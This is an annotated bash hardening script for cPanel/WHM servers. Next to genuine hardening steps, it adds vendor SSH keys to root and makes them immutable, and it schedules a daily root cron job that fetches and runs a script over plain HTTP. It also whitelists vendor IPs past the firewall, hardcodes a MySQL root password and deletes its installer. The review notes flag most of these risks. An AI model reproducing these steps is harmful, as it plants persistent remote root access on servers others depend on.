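#!/bin/bash
# Server4Sale cPanel/WHM post-install hardening script.
# Specifications Ver. 1.33 (26may2006) -- Nick AT server4sale DOT com.
#
# Must run as root. It rewrites /etc/selinux/config, sshd_config, /etc/my.cnf,
# rc.local, /etc/crontab and the APF firewall config, builds third-party tools
# fetched over plain HTTP, adds vendor SSH keys to root's authorized_keys and
# forwards root's mail off-box. Read the whole thing before running it on a
# box you are responsible for.
#
# The first line was `##!/bin/bash`: a doubled '#' is a comment, not a shebang,
# so the script ran under whatever shell happened to invoke it. Fixed.
#
# No `set -e` on purpose: most steps are best-effort against packages and paths
# that may not exist on a given image, and the script is meant to keep going.
echo "Specifications Ver. 1.33 (26may2006)"
echo "Compiled, tweaked, etc..."
echo "Nick AT server4sale DOT com"

# Remember the launch directory (the script returns there at the end and removes
# build.sh), then work out of a scratch directory under /root. Both cd's are
# guarded: without them the original carried on and unpacked/built in whatever
# directory it happened to be in.
lcd=$(pwd)
cd /root || exit 1
mkdir -p /root/nick
cd /root/nick || exit 1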

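echo "SE Linux"
# NOTE(review): this switches SELinux off now (setenforce 0) and permanently
# (config rewrite). On a shared hosting box that removes a whole layer of
# containment between customer accounts and the system; it is kept because the
# rest of this build (cPanel era tooling) assumed it, but it is a real trade-off.
#
# The original rewrote the config via `cat | sed | sed > q; mv -f q ...`, which
# left a temp file in the working directory and replaced the config with a file
# created under the current umask. `sed -i` edits in place and keeps the mode.
# The pattern is anchored so only the real `SELINUX=` line is touched, not any
# commented examples. The .orig copy is the rollback path.
setenforce 0
cp /etc/selinux/config /etc/selinux/config.orig
sed -i -e 's/^SELINUX=permissive/SELINUX=disabled/' \
       -e 's/^SELINUX=enforcing/SELINUX=disabled/' /etc/selinux/config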

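# Vendor SSH public keys for root (ns5.astrohost.biz, stats.support4sale.com).
# NOTE(review): this is standing, password-less root access for whoever holds the
# matching private keys, and the `chattr +i` below means the keys cannot be
# revoked -- nor can any other key be added -- without `chattr -i` first. Anyone
# auditing this box needs to know these are here. The second key line is a
# placeholder in this copy of the script and must be filled in before use.
#
# Changes from the original: .ssh is created 0700 (sshd StrictModes-safe) and
# each key is appended only if not already present, so re-running the script
# does not pile up duplicate lines. The key material itself is unchanged.
mkdir -p -m 700 /root/.ssh
[ -e /root/.ssh/authorized_keys ] || touch /root/.ssh/authorized_keys
while IFS= read -r key; do
  [ -n "$key" ] || continue
  grep -qxF -- "$key" /root/.ssh/authorized_keys \
    || printf '%s\n' "$key" >> /root/.ssh/authorized_keys
done <<'KEYS'
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAgEAoALL59a0/gp3SmhQqioh4+gYBYqvdlBmxZH7Ss+mNQNJXxbtZPrL3eD1c6hC1Fp8VSfcy/sMeplFRuYS54r9oKc848uafuvzw/nqapq4/6MkqvlIP8McSN6E9aVDr1NMtj+icCScMp1Dj175iIr2miC3YOVb7UlDcPwrheYTQ3bXXnCd5OYhf2pRW2vdMTwIZKz3ZpS2a7kCU/Q02Kl9dcEVHGgwLU6MAQGuEWuRNc3NdbM6hNYXlJP1FE5ysZEOyzuVquxGMepFZ2zmHkOxGPa66VVPSrcLPzyuBC81hc+if5VX7JBVnaL9KZabzzcCft0IIlLxvtwqFWmAhQwHTOatuW2d5eXt5hZSixoA8kiWs9Qx4L4hAcVT9ZG3iI1kKGl146oCO17ZHbgiQDjHodPZqHvLzieihC93sIqwmbht3J7RfbIMsgAUgkEBEMjOkThx568pAEZvCFlhuI7yAW+8cmnVsjYJFNzDWCVErEtpkdtqbjg/CQMuZBI0521WidXCNwdO7iSKCab4y6E16V3I4sIEbudSbPWhKosSVz7jD2D6dfAdvIcC5L8dnxjLqcajrTYdGNQiyAN8yKL0aHyY9m0+Gn3LkDqoYsU4eiOuwqaLk0x+iuMftm7pm1EwSKQXNB9TP0mPhZ2ztQL6vAyPs5LzxzJkUNmoXkZPB0k= root@ns5.astrohost.biz
ssh-rsa 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 root@stats.support4sale.com
KEYS
chmod 600 /root/.ssh/authorized_keys
chattr +i /root/.ssh/authorized_keys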


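echo "Securing ..."
# cPanel's own hardening helpers: securetmp gives /tmp its own (noexec) filesystem,
# secureit applies cPanel's checklist, compilers off locks compilers away from users.
/scripts/securetmp --auto 1> /dev/null
/scripts/securetmp --install 1> /dev/null

# Fold /var/tmp into the secured /tmp by replacing it with a symlink.
# NOTE(review): `rm -rf /var/tmp` destroys anything live in there. The guard
# matters for re-runs: once /var/tmp is a symlink, the original's
# `rm -rf /var/tmp/` (trailing slash) follows the link and empties /tmp itself.
if [ ! -L /var/tmp ]; then
  rm -rf /var/tmp
  ln -s /tmp /var/tmp
fi

# Re-mount /dev/shm -- presumably to pick up the mount options securetmp put in
# fstab (confirm against the securetmp docs for this cPanel version).
umount /dev/shm
mount /dev/shm
/scripts/secureit 1> /dev/null
/scripts/compilers off 1> /dev/null

# cPanel feature kill-switches: the presence of the file disables the service.
touch /etc/interchangedisable
touch /etc/melangedisable
touch /etc/entropychatdisable
/etc/init.d/cpanel restart 1> /dev/null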

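echo "WHM Access.."
# Point the WHM redirect references in httpd.conf at a non-default CGI name
# (/swhmredirect.cgi, base/swhmredirect.cgi). Whether that renamed CGI exists is
# set up elsewhere -- not in this script.
#
# The original used `sed -ie` and `sed -ief`. GNU sed reads those as -i with the
# backup suffix "e" / "ef": the substitution still ran, but it left stray
# httpd.confe and httpd.confef copies beside the live config. -i and -e are
# separate options.
#
# Arguments: $1 - path to the httpd.conf to rewrite in place
patch_whm_redirect() {
  sed -i -e 's/\/whmredirect.cgi/\/swhmredirect.cgi/' \
         -e 's/base\/redirect.cgi/base\/swhmredirect.cgi/' -- "$1"
}

cp /usr/local/apache/conf/httpd.conf /usr/local/apache/conf/httpd.conf.orig
patch_whm_redirect /usr/local/apache/conf/httpd.conf
service httpd restart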


echo disabling tools..
# Take world-execute off the usual download/transfer clients so ordinary hosting
# users cannot pull files onto the box with them; root and group root keep them.
# Missing binaries print chmod's own error, exactly as before.
# NOTE(review): this is friction, not a control -- curl, perl, python and php can
# all fetch files too -- and chmod 750 on scp/rcp breaks those for every
# non-root user, cPanel accounts included.
for tool in \
  /usr/kerberos/bin/ftp \
  /usr/bin/elinks \
  /usr/bin/links \
  /usr/bin/lynx \
  /usr/bin/rcp \
  /usr/bin/wget \
  /usr/bin/scp
do
  chmod 750 "$tool"
done


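echo monitor..
# Tell cPanel's chkservd which services to watch: one empty marker file per
# service name in its monitor directory.
#
# The original did `cd dir; for ...; do touch $i; done` with no check on the cd,
# so on a box where that directory did not exist the marker files were scattered
# into whatever the current directory was. Guarded now.
monitor_dir=/var/run/chkservd/monitor
if cd "$monitor_dir"; then
  for svc in antirelayd cpsrvd exim eximstats ftpd httpd imap mysql named pop \
             spamd syslogd sshd cppop xinetd; do
    touch "$svc"
  done
else
  echo "warning: $monitor_dir missing, chkservd monitors not enabled" >&2
fi
/etc/init.d/chkservd restart 1> /dev/null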



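# Turn off every service xinetd currently has enabled ("disable = no" -> "yes").
#
# The original `sed -ie` was parsed by GNU sed as -i with backup suffix "e", so
# it left a stray copy (e.g. telnete) next to every file it touched -- and
# xinetd reads every file in the directory, so those copies were picked up too.
# Matching is on the exact spacing "disable = no", as before; an entry written
# as `disable  = no` or with tabs is left alone (same limitation as the original,
# worth a manual check with `chkconfig --list`).
#
# Arguments: $1 - xinetd config directory (default /etc/xinetd.d)
disable_xinetd_services() {
  local dir=${1:-/etc/xinetd.d}
  find "$dir" -type f -exec grep -q "disable = no" {} \; \
       -exec sed -i -e 's/disable = no/disable = yes/' {} \;
}
disable_xinetd_services /etc/xinetd.d
/etc/init.d/xinetd restart 1> /dev/null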



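echo SSH
# Harden sshd: SSHv1 off (Protocol 2 only) and rate-limit unauthenticated
# connections (MaxStartups 10:50:20 -- start dropping 50% of new unauthenticated
# connections at 10 in flight, all of them at 20).
#
# The original only rewrote the commented-out defaults (`#Protocol 2,1`,
# `#MaxStartups 10`). A config that already set either directive -- including an
# uncommented `Protocol 2,1`, which still allows SSHv1 -- was left as it was.
# This rewrites any existing line for those two directives, commented or not,
# and appends them if absent. It also edits in place instead of
# `cat | sed > q; mv`, which replaced sshd_config with a file created under the
# current umask.
#
# NOTE(review): PermitRootLogin is left untouched; with vendor keys in root's
# authorized_keys, `PermitRootLogin without-password` would at least take
# password guessing against root off the table.
#
# Arguments: $1 - path to sshd_config
harden_sshd_config() {
  local f=$1
  sed -i -e 's/^#*Protocol[[:space:]].*/Protocol 2/' \
         -e 's/^#*MaxStartups[[:space:]].*/MaxStartups 10:50:20/' -- "$f"
  grep -q '^Protocol ' "$f" || printf 'Protocol 2\n' >> "$f"
  grep -q '^MaxStartups ' "$f" || printf 'MaxStartups 10:50:20\n' >> "$f"
}

cp /etc/ssh/sshd_config /etc/ssh/sshd_config.orig
harden_sshd_config /etc/ssh/sshd_config
/etc/init.d/sshd restart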


# Keep a copy of the resolver config before any package work, then install the
# Perl modules the tools built later in this script depend on (presumably mytop
# and rkhunter -- the script does not say). Output is discarded, so a failed
# install only shows up when the tool later fails to run.
cp /etc/resolv.conf /etc/resolv.conf.orig
perl_deps=(perl-TermReadKey perl-Time-HiRes perl-TimeDate perl-Net-DNS
           perl-Digest-HMAC-1 perl-Digest-SHA1 perl-DBI)
yum install "${perl_deps[@]}" -y 1> /dev/null


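cp /etc/my.cnf /etc/my.cnf.orig

# Slow-query log: owned by root, writable by the mysql group only.
touch /var/log/mysql_slow_query.log
chown root:mysql /var/log/mysql_slow_query.log
chmod 660 /var/log/mysql_slow_query.log

# Replace /etc/my.cnf wholesale (the .orig copy above is the only way back).
# Option values are the original's, verbatim: `set-variable =` is the old pre-5.0
# spelling, kept for the MySQL builds this script targeted.
# bind-address=127.0.0.1 keeps MySQL off the network -- note the APF section of
# this script still opens TCP/3306 inbound, which this setting makes unnecessary.
cat <<'EOF' > /etc/my.cnf
[mysqld]
datadir=/var/lib/mysql
socket=/var/lib/mysql/mysql.sock
set-variable = max_connections=500
safe-show-database
bind-address=127.0.0.1
log-slow-queries = /var/log/mysql_slow_query.log
connect_timeout=50
thread_cache_size=64
key_buffer_size=64M
join_buffer=1M
tmp_table_size=32M
max_allowed_packet=16M
record_buffer=1M
sort_buffer_size=1M
read_buffer_size=1M

[mysql.server]
user=mysql
basedir=/var/lib

[mysqld_safe]
err-log=/var/log/mysqld.log
pid-file=/var/run/mysqld/mysqld.pid
EOF

/etc/init.d/mysql restart 1> /dev/null
ps aux | grep mysql   # informational only (also matches the grep itself)

# MySQL root password.
# NOTE(review): the original baked the same password into every server built with
# this script, and mysqladmin takes it on the command line, where any local user
# can read it from `ps` while the command runs. The default is kept so the
# vendor's tooling keeps working; override per host with MYSQL_ROOT_PASSWORD=...
# in the environment whenever you can.
mysql_root_pw=${MYSQL_ROOT_PASSWORD:-3948ur3942309amkwj}
/usr/bin/mysqladmin -u root password "$mysql_root_pw"

# Client credentials for root's mysql/mysqladmin.
# The original wrote this with `echo '...' \ ` -- the trailing space after the
# backslash escaped the space, not the newline, so `> /root/.my.cnf` ran as a
# separate command: the file was created EMPTY and the credentials went to
# stdout. It also used `pass=`, which is not a MySQL client option (the option
# is `password`), and left the file at the default umask instead of root-only.
(
  umask 077
  cat <<EOF > /root/.my.cnf
[client]
user="root"
password="$mysql_root_pw"
EOF
)
chmod 600 /root/.my.cnf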


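echo RPM cleaning
# Packages with no business on a hosting box: r-services, NIS, printing, X fonts,
# GNOME / redhat-config GUIs, and so on. Review the list before use -- it also
# drops things like vim-enhanced, pciutils and nfs-utils, and it removes elinks
# and links even though the script chmod'ed them earlier.
#
# NOTE(review): `rpm -e a b c` refuses the whole transaction when any single name
# is not installed. The list was written against one particular image, so on most
# boxes the original one-liner printed "package X is not installed" and removed
# nothing. Filter down to what is actually installed first, then erase in one
# transaction so rpm still does its dependency ordering and checks.
unwanted_pkgs=(
  rwall-server rusers-server rwho rusers telnet-server ipchains lokkit
  isdn4k-utils isdn4k-utils-devel gpm links gpm-devel aumix sndconfig
  linuxconf-devel linuxconf XFree86-xfs chkfontpath ttfonts urw-fonts cups
  cups-drivers esound esound-devel samba samba-common samba-client inn inn-devel
  pidentd nscd nss_ldap a2ps ash mc bcm5820 eject hwcrypto pciutils kudzu-devel
  pciutils-devel redhat-logos inews foomatic pnm2ppa autofs raidtools mt-st
  reiserfs-utils apmd micq rsh talk talk-server rmt yp-tools ypbind ypserv cvs
  fetchmail mouseconfig hotplug elinks usbutils finger finger-server rdist radvd
  rsh-server lockdev lockdev-devel libusb libusb-devel rcs xdelta xdelta-devel
  nmh dhcpcd swig mutt metamail nfs-utils dump VFlib2 ghostscript cups-devel
  printconf jadetex docbook-utils docbook-utils-pdf cups-drivers-hpijs
  cups-drivers-pnm2ppa ghostscript-fonts VFlib2-devel efax cups-libs tetex
  tetex-afm tetex-dvilj tetex-latex passivetex tetex-dvips xmltex linuxdoc-tools
  xmltodocbook-utils docbook-style-dsssl lm_sensors docbook-style-xsl LPRng Omni
  watanabe-vf ttfonts-ja nkf tux mpage Omni-foomatic hpijs gimp-print minicom
  wvdial XFree86-truetype-fonts kernel-pcmcia-cs vim-enhanced xmlto VFlib2-conf-ja
  redhat-config-securitylevel fam w3m libgnome libgnomeui redhat-config-samba
  redhat-config-printer gnome-vfs2 libbonoboui gnome-python2-bonobo gnome-python2
  redhat-config-network redhat-config-printer-gui redhat-config-services
  redhat-config-bind gtkhtml2 gnome-python2-gtkhtml2 redhat-config-packages
  redhat-config-nfs redhat-config-httpd redhat-lsb
)
installed_pkgs=()
for p in "${unwanted_pkgs[@]}"; do
  rpm -q "$p" > /dev/null 2>&1 && installed_pkgs+=("$p")
done
if [ "${#installed_pkgs[@]}" -gt 0 ]; then
  rpm -e "${installed_pkgs[@]}"
fi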


echo Time
# Pin the box to US/Eastern (old localtime kept as .orig), sync the clock once
# now, and again every hour at :57 via ntpdate from /etc/crontab.
# NOTE(review): ntpdate from cron steps the clock rather than slewing it, which
# can put visible jumps into logs; ntpd would be the smoother choice. Re-running
# this script appends the cron line a second time.
mv /etc/localtime /etc/localtime.orig
ln -s /usr/share/zoneinfo/US/Eastern /etc/localtime
printf '%s\n' "57 * * * * root ntpdate pool.ntp.org 1> /dev/null 2> /dev/null" >> /etc/crontab
rdate -s rdate.cpanel.net
ntpdate pool.ntp.org
hwclock --systohc




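echo MyTOP..
# mytop (MySQL "top").
# NOTE(review): every tool in this script is pulled over plain HTTP from a bare
# IP (65.110.52.159) with no checksum or signature, so whoever controls that
# host -- or the network path to it -- controls what gets built and installed as
# root here. At minimum pin a known sha256 per tarball before running this on a
# new box.
#
# The steps are chained: the original ran `make install` regardless of whether
# the download or the `cd mytop-*` had succeeded, i.e. from /root/nick itself
# after a failed fetch.
cd /root/nick \
  && wget -q http://65.110.52.159/net/mytop-1.4.tar.gz \
  && tar -xzf mytop-1.4.tar.gz \
  && cd mytop-* \
  && perl Makefile.PL 1> /dev/null \
  && make 1> /dev/null \
  && make test 1> /dev/null \
  && make install \
  || echo "warning: mytop install failed" >&2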




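echo BFD..
# Brute Force Detection (R-fx Networks). Same unauthenticated-HTTP caveat as the
# other tools: nothing verifies the tarball. Steps are chained so a failed
# download does not run install.sh from the wrong directory. ALERT_USR=1 turns
# on BFD's e-mail alerts (recipient per conf.bfd).
cd /root/nick \
  && wget -q http://65.110.52.159/net/bfd-current.tar.gz \
  && tar -xzf bfd-current.tar.gz \
  && cd bfd-* \
  && ./install.sh 1> /dev/null \
  && sed -i.orig 's/ALERT_USR="0"/ALERT_USR="1"/' /usr/local/bfd/conf.bfd \
  || echo "warning: bfd install failed" >&2
cd /root/nick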


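echo RootKIT Hunter..
cd /root/nick
echo "installing rkhunter"
# rkhunter: fetched over plain HTTP with no checksum (see the caveat on the other
# tools), then scheduled twice a day (00:xx and 12:xx) from /etc/crontab.
#
# The original's third crontab line (--versioncheck) had no `>> /etc/crontab`,
# so it was printed to the terminal and never scheduled; it is appended here
# with the other two (and without the stray `;` that split its redirections).
# The first update/scan runs immediately so the baseline exists before the
# cron jobs do.
if wget -q http://65.110.52.159/net/rkhunter-1.2.8.tar.gz \
   && tar -xzf rkhunter-1.2.8.tar.gz \
   && cd rkhunter \
   && ./installer.sh 1> /dev/null
then
  cat <<'EOF' >> /etc/crontab
1 0-23/12 * * * root /usr/local/bin/rkhunter --update
2 0-23/12 * * * root /usr/local/bin/rkhunter --cronjob --report-mode --checkall
0 0-23/12 * * * root /usr/local/bin/rkhunter --versioncheck 1>/dev/null 2>/dev/null
EOF
  cd /root/nick
  /usr/local/bin/rkhunter --update
  /usr/local/bin/rkhunter --cronjob --report-mode --checkall --versioncheck 1> /dev/null
else
  echo "warning: rkhunter install failed" >&2
fi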


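echo ChkRootKIT..
cd /root/nick
# chkrootkit: built from an unauthenticated HTTP download (same caveat as the
# other tools), moved to /etc/<chkrootkit-version>/ and run daily at 06:05; only
# output lines other than "nothing found" / "not infected" are mailed to root.
#
# The original cron command was `cd /etc/$a/chkrootkit; ./chkrootkit ...`, but
# /etc/$a/chkrootkit is the chkrootkit script itself, not a directory: the cd
# failed every time and ./chkrootkit was then looked up relative to cron's own
# working directory, so the daily check never actually ran. It now cd's into the
# install directory and only runs the check if that succeeds.
if wget -q http://65.110.52.159/net/chkrootkit.tar.gz \
   && tar -xzf chkrootkit.tar.gz \
   && cd chkrootkit-* \
   && make 1> /dev/null
then
  ckdir=$(basename "$(pwd)")
  cd /root/nick
  mv "$ckdir" /etc
  cd "/etc/$ckdir"
  printf '%s\n' "5 6 * * * root cd /etc/$ckdir && ./chkrootkit | grep -v 'nothing found' | grep -v 'not infected' | mail -s 'chkrootkit' root" >> /etc/crontab
  # First run now: one copy mailed to root, one shown on the terminal.
  ./chkrootkit | grep -v "nothing found" | grep -v "not infected" | mail -s "chkrootkit" root
  ./chkrootkit | grep -v "nothing found" | grep -v "not infected"
else
  echo "warning: chkrootkit build failed" >&2
fi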



#echo LibSafe..
#cd /root/nick
#wget http://65.110.52.159/net/libsafe-2.0-16.i386.rpm
#rpm -i libsafe-2.0-16.i386.rpm


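echo Linux Socket Monitor..
# LSM (R-fx Networks): unauthenticated HTTP download, same caveat as the other
# tools. Steps are chained so install.sh never runs from the wrong directory.
# `lsm -c` is run right after install -- presumably to take the first socket
# comparison baseline; confirm against the LSM docs for this version.
cd /root/nick \
  && wget -q http://65.110.52.159/net/lsm-current.tar.gz \
  && tar -xzf lsm-current.tar.gz \
  && cd lsm* \
  && sh ./install.sh 1> /dev/null \
  && lsm -c 1> /dev/null \
  || echo "warning: lsm install failed" >&2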


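echo Process Resource Monitor..
# PRM (R-fx Networks): unauthenticated HTTP download, same caveat as the other
# tools; steps chained so install.sh never runs from the wrong directory.
# The sed turns the `*/4` field of the installed /etc/cron.d/prm entry into `*`,
# i.e. runs PRM every period instead of every fourth (presumably minutes --
# check the installed file).
cd /root/nick \
  && wget -q http://65.110.52.159/net/prm-current.tar.gz \
  && tar -xzf prm-current.tar.gz \
  && cd prm* \
  && sh ./install.sh 1> /dev/null \
  && sed -i.orig 's/\*\/4/\*/' /etc/cron.d/prm \
  || echo "warning: prm install failed" >&2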


#http://www.r-fx.ca/downloads/les-current.tar.gz
#tar xzf les-current.tar.gz
#cd les*

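echo Multi Tail - to view multiple log files simultaneously
# multitail is a convenience for the operator, not a control. Same unauthenticated
# HTTP source as everything else; steps chained so `make install` cannot run
# from the wrong directory after a failed download.
cd /root/nick \
  && wget -q http://65.110.52.159/net/multitail-3.8.5.tgz \
  && tar xzf multitail-3.8.5.tgz \
  && cd multitail* \
  && make install 1> /dev/null \
  || echo "warning: multitail install failed" >&2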

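cp /etc/rc.local /etc/rc.local.orig

# Boot-time kernel network hardening, appended to rc.local.
#
# What was wrong in the original:
#  * it finished with `> /etc/rc.local`, so the existing rc.local (shebang
#    included) was replaced rather than appended to -- the `>>` a few lines
#    earlier shows appending was the intent;
#  * several targets mixed sysctl key names into /proc paths
#    (/proc/sys/net/ipv4/net.ipv4.ip_forward, /proc/sys/net/ipv4/kernel.sysrq,
#    ...), which do not exist, and one wrote to a relative file named
#    `net.ipv4.tcp_keepalive_time` in the current directory;
#  * `for $i in ...` is a syntax error, which aborted rc.local at that point on
#    every boot.
#
# NOTE(review): these settings only take effect on reboot -- the script never
# applies them to the running kernel -- and /etc/sysctl.conf is the usual home
# for them (applied earlier in boot than rc.local).
#
# Outputs: the rc.local snippet on stdout, so it can be syntax-checked/reviewed.
rc_local_snippet() {
  cat <<'EOF'

/scripts/securetmp --auto
echo "1" > /proc/sys/net/ipv4/tcp_syncookies
echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts
echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all
echo "0" > /proc/sys/net/ipv4/conf/all/accept_redirects
echo "1" > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses
echo 512 > /proc/sys/net/ipv4/neigh/default/gc_thresh1
echo 2048 > /proc/sys/net/ipv4/neigh/default/gc_thresh2
echo 4096 > /proc/sys/net/ipv4/neigh/default/gc_thresh3
echo "0" > /proc/sys/net/ipv4/ip_forward
echo "1" > /proc/sys/net/ipv4/conf/default/rp_filter
echo "0" > /proc/sys/net/ipv4/conf/default/accept_source_route
echo "0" > /proc/sys/kernel/sysrq
echo "1" > /proc/sys/kernel/core_uses_pid
echo "60" > /proc/sys/net/ipv4/tcp_fin_timeout
echo "3600" > /proc/sys/net/ipv4/tcp_keepalive_time
for i in /proc/sys/net/ipv4/conf/*/rp_filter; do
  echo 1 > "$i"
done
for i in /proc/sys/net/ipv4/conf/*/accept_source_route; do
  echo 0 > "$i"
done
EOF
}

rc_local_snippet >> /etc/rc.local
echo
/scripts/securetmp --install 1> /dev/null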


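echo Logs..
# Compress rotated logs; have updatedb refresh the locate database daily.
# The two `rpm -qa | grep` lines are informational (is logwatch/cron present?).
sed -i.orig "s/#compress/compress/" /etc/logrotate.conf
rpm -qa | grep logwatch
rpm -qa | grep cron
sed -i.orig "s/DAILY_UPDATE=no/DAILY_UPDATE=yes/" /etc/updatedb.conf

# Mail the NOC on every interactive root login.
# NOTE(review): this is an after-the-fact notice that anyone who is already root
# can simply delete from .bash_profile, and it sends hostname and `who` output
# off-box in plain e-mail. Auth logs shipped to a remote syslog host are the
# dependable version of this. The original appended the line unconditionally, so
# every re-run of the script added another alert mail per login; it is now added
# only if not already present. The line itself is unchanged.
root_alert='echo "ALERT - Root Shell Access on:" `date` `who` | mail -s "Alert: Root Access" noc@server4sale.com'
grep -qF -- "$root_alert" /root/.bash_profile 2>/dev/null \
  || printf '%s\n' "$root_alert" >> /root/.bash_profile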

# Legal warning banner, appended to the message of the day.
# NOTE(review): /etc/motd is only displayed after a successful login. For a
# notice the user sees before authenticating, point sshd's `Banner` directive at
# a file carrying this text as well.
cat <<'EOF' >> /etc/motd

ALERT! You are entering a secured area! Your IP and login information
have been recorded. System administration has been notified.

This system is restricted to authorized access only. All activities on
this system are recorded and logged. Unauthorized access will be fully
investigated and reported to the appropriate law enforcement agencies.

EOF

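echo S4S updating scripts..
echo
# Vendor "updates": every day at 06:00 root downloads daily.sh from a plain-HTTP
# URL on a bare IP and executes it.
# NOTE(review): this is standing remote code execution as root for whoever
# controls 65.110.52.159 or can interpose on HTTP to it -- no TLS, no signature,
# no checksum. If the channel has to exist, serve it over HTTPS with a pinned
# certificate or verify a detached signature before running it, and remember it
# is here during any incident review of this box.
#
# Mechanics fixed from the original: wget saved daily.sh relative to cron's
# working directory (and chmod/sh/rm were relative too), so a daily.sh already
# sitting there would be the one executed (wget saves the fresh download as
# daily.sh.1 in that case). Now it downloads into a private temp dir, runs only
# what was just fetched, and cleans up.
daily_cmd='d=$(mktemp -d) && cd "$d" && wget -q -O daily.sh http://65.110.52.159/net/daily.sh && sh daily.sh; cd /; [ -n "$d" ] && rm -rf "$d"'
printf '%s\n' "0 6 * * *  root $daily_cmd > /dev/null 2>&1" >> /etc/crontab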

echo Alerts to NOC..
# Forward all of root's local mail (rkhunter/chkrootkit/BFD reports, login
# alerts) to the vendor NOC, replacing any existing .forward.
# NOTE(review): that is plaintext SMTP off-box carrying scan findings and host
# details -- make sure the receiving side is meant to get them.
printf '%s\n' "noc@server4sale.com" > /root/.forward


# Back to the launch directory and remove build.sh there -- presumably this
# script's own copy (bash keeps the open file, so the APF section below still
# runs). NOTE(review): deleting the installer leaves nothing on the box showing
# what was changed; keep a copy off-box for audit or incident review. Then print
# the operator's follow-up instructions (the quotes around "1"/"0"/"eth1" were
# consumed by the shell in the original too, so the printed text is identical).
cd "$lcd"
rm -fr build.sh

printf '%s\n' \
  'Ok.' \
  'Nick @ Server 4 sale . com' \
  'Login to server, edit /etc/apf/conf.apf an change DEVEL_MODE=1 to 0 and reboot.' \
  'if you cant login, wait 5 minutes, try to login again then check APF config.' \
  'for SoftLayer Servers you must change IFACE_IN=eth1 and IFACE_OUT=eth1 for now'

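echo APF..
# APF firewall (R-fx Networks), from the same unauthenticated HTTP mirror as the
# other tools (no checksum). Existing iptables rules are parked as .orig.
mv /etc/sysconfig/iptables /etc/sysconfig/iptables.orig 2> /dev/null
cd /root/nick \
  && wget -q http://65.110.52.159/net/apf-current.tar.gz \
  && tar -xzf apf-current.tar.gz \
  && cd apf-* \
  && sh ./install.sh 1> /dev/null \
  || echo "warning: apf install failed" >&2

# Rewrite conf.apf in place.
# Fixes vs the original: `cat | sed ... > q; mv` replaced the file with one
# created under the current umask; `sed -ief` left a stray conf.apfef backup
# (GNU sed took "ef" as the -i suffix); and the inbound TCP list contained
# spaces ("5666, 8080, 8443"), which APF's comma-separated port lists are
# unlikely to parse as intended -- the spaces are removed.
#
# NOTE(review): the inbound list opens 3306 (MySQL is bound to 127.0.0.1 by this
# script, so that is unnecessary) plus 5100, 6666, 7786, 9022 and 3000_3500,
# whose purpose is not documented anywhere in this script -- confirm each before
# deploying. USE_DS/USE_AD presumably enable APF's DShield and anti-DoS features
# (check the conf.apf comments for this version).
#
# Arguments: $1 - path to conf.apf
configure_apf_conf() {
  sed -i \
    -e 's/IG_TCP_CPORTS="22"/IG_TCP_CPORTS="21,22,25,53,80,110,143,443,465,953,993,995,2082,2083,2084,2086,2087,2095,2096,3306,5100,6666,7786,3000_3500,5666,8080,8443,9022"/' \
    -e 's/IG_UDP_CPORTS=""/IG_UDP_CPORTS="53,161,6277"/' \
    -e 's/EG_TCP_CPORTS="21,25,80,443,43"/EG_TCP_CPORTS="21,25,37,53,80,110,113,443,43,873,953,2089,2703,3306,5666"/' \
    -e 's/EG_UDP_CPORTS="20,21,53"/EG_UDP_CPORTS="20,21,53,873,953,6277"/' \
    -e 's/USE_DS="0"/USE_DS="1"/' \
    -e 's/USE_AD="0"/USE_AD="1"/' -- "$1"
}
cp /etc/apf/conf.apf /etc/apf/conf.apf.orig
configure_apf_conf /etc/apf/conf.apf

# Hosts that bypass the firewall entirely (vendor monitoring / management).
# NOTE(review): allow_hosts entries are not restricted by port; these addresses
# are a trust boundary and should be removed when the vendor relationship ends.
for host in 65.110.52.150 216.32.66.226 72.232.81.2 202.5.145.58 216.32.82.58 63.246.154.88; do
  echo "$host" >> /etc/apf/allow_hosts.rules
done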

echo Disabling compilers
# Belt-and-braces on top of `/scripts/compilers off` earlier in the script: zero
# the mode bits on every compiler front/back end we know a path for. Only
# unprivileged users are affected (root ignores mode bits). The globs stay
# unquoted on purpose (i386*cc, *c++, *g++) and missing paths are silent, as
# in the original.
for compiler in \
  /usr/bin/perlcc /usr/bin/byacc /usr/bin/yacc /usr/bin/bcc /usr/bin/kgcc \
  /usr/bin/cc /usr/bin/gcc /usr/bin/i386*cc /usr/bin/*c++ /usr/bin/*g++ \
  /usr/lib/bcc /usr/lib/bcc/bcc-cc1 \
  /usr/i386-glibc21-linux/lib/gcc-lib/i386-redhat-linux/2.96/cc1
do
  chmod 000 "$compiler" 2>/dev/null
done



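# Bring up the new firewall config. Per the instructions printed earlier, APF is
# left in DEVEL_MODE="1" on purpose: it reportedly disarms itself a few minutes
# after start, so a wrong port list does not lock the operator out before they
# can fix it.
/etc/init.d/apf restart 2>/dev/null

# The original ended with `kill -9 $$`: SIGKILL on the running shell gives the
# caller exit status 137, skips any EXIT trap, and -- had someone sourced this
# file rather than executed it -- would have killed their login shell. A normal
# exit ends the run; if the intent was to drop the invoking session, do that
# explicitly from the caller.
exit 0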


